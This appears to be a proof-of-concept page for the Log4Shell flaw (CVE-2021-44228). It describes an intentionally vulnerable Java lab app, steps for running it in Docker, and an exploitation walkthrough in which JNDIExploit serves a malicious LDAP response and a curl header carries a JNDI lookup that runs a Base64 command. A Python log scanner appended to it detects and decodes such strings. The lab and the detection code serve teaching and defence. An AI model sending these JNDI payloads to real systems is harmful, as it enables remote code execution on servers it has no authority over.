
CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Associated Vulnerability
Title: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
Java application vulnerable to CVE-2021-44228
Readme
# TekiumLog4jApp v1.0

Author: Erick Rodríguez 

Email: erickrr.tbd93@gmail.com, erodriguez@tekium.mx

License: GPLv3

Application developed in Java that simulates an application vulnerable to CVE-2021-44228. 

It uses Log4j 2.11.1 and JDK 1.8.0_181.

![TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp/blob/master/screens/screen.jpg)

# Running

Run it:

`docker run --name tekiumlog4japp -p 8080:8080 d0ck3rt3k1umhub/tekiumlog4japp:v1`

Build the Docker image by yourself:

`docker build . -t tekiumlog4japp`

`docker run -p 8080:8080 --name tekiumlog4japp tekiumlog4japp`

# Exploitation Steps

<i>Note: This project is inspired by the <a href="https://github.com/christophetd/log4shell-vulnerable-app">christophetd</a> project.</i>

JNDIExploit.v1.2.zip is included in the repository because it was apparently removed from GitHub.

- Use <a href="https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip">JNDIExploit</a> to spin up a malicious LDAP server

`unzip JNDIExploit.v1.2.zip`

`java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888`

- Then, trigger the exploit using:

`curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC90ZWtpdW1fcHJ1ZWJhLnR4dA==}'`

- Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:

![TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp/blob/master/screens/response.jpg)

- To confirm that the code execution was successful, notice that the file /tmp/tekium_prueba.txt was created in the container running the vulnerable application:

`docker exec tekiumlog4japp ls /tmp`
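On the defensive side of the lab above, the request that triggers the lookup leaves a recognisable `${jndi:...}` string in any access log or header capture. The following is an added example, not part of the original project, that scans constructed sample log lines for JNDI lookup strings and decodes the Base64 command embedded in the JNDIExploit route used on this page, so an analyst can see what a logged probe would have executed:

```python
import base64
import binascii
import re
from typing import Optional

# Constructed sample access-log lines (not from the original page). The first
# carries the same X-Api-Version value the README's curl command sends; the
# second is a benign request for contrast.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 42 "X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC90ZWtpdW1fcHJ1ZWJhLnR4dA==}"
10.0.0.6 - - [12/Dec/2021:10:01:05 +0000] "GET /health HTTP/1.1" 200 2 "X-Api-Version: 1.0"
"""

# A JNDI lookup as Log4j 2.x would interpolate it: ${jndi:<scheme>://<host>[:<port>]<path>}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}]+)(?::(?P<port>\d+))?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)
# JNDIExploit's "Basic/Command/Base64/<b64>" route, as used in the README above
CMD_RE = re.compile(r"/Basic/Command/Base64/(?P<b64>[A-Za-z0-9+/=]+)")


def decode_command(path: str) -> Optional[str]:
    """Return the command embedded in a JNDIExploit Base64 route, or None if the
    path is not that route or the Base64 is invalid."""
    m = CMD_RE.search(path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_jndi_lookups(log_text: str) -> list[dict]:
    """Scan log text for JNDI lookup strings and return one finding per hit."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for m in JNDI_RE.finditer(line):
            findings.append({
                "line": lineno,
                "scheme": m.group("scheme").lower(),
                "host": m.group("host"),
                "port": int(m.group("port")) if m.group("port") else None,
                "path": m.group("path"),
                "command": decode_command(m.group("path")),
            })
    return findings


if __name__ == "__main__":
    for f in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {f['line']}: {f['scheme']}://{f['host']}:{f['port']} -> {f['command']!r}")
```

Run against the sample, the first line yields the decoded command `touch /tmp/tekium_prueba.txt`, which is exactly the file the `docker exec` check above looks for.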

# Commercial Support
![Tekium](https://github.com/unmanarc/uAuditAnalyzer2/blob/master/art/tekium_slogo.jpeg)

Tekium is a cybersecurity company based in Mexico that specializes in red team and blue team activities. It has clients in the financial, telecom and retail sectors.

Tekium is an active sponsor of the project, and provides commercial support in the case you need it.

For integration with other platforms such as the Elastic stack, SIEMs, managed security providers, or in-house solutions, or for any other requests for extending current functionality that you wish to see included in future versions, please contact us: info at tekium.mx

For more information, go to: https://www.tekium.mx/
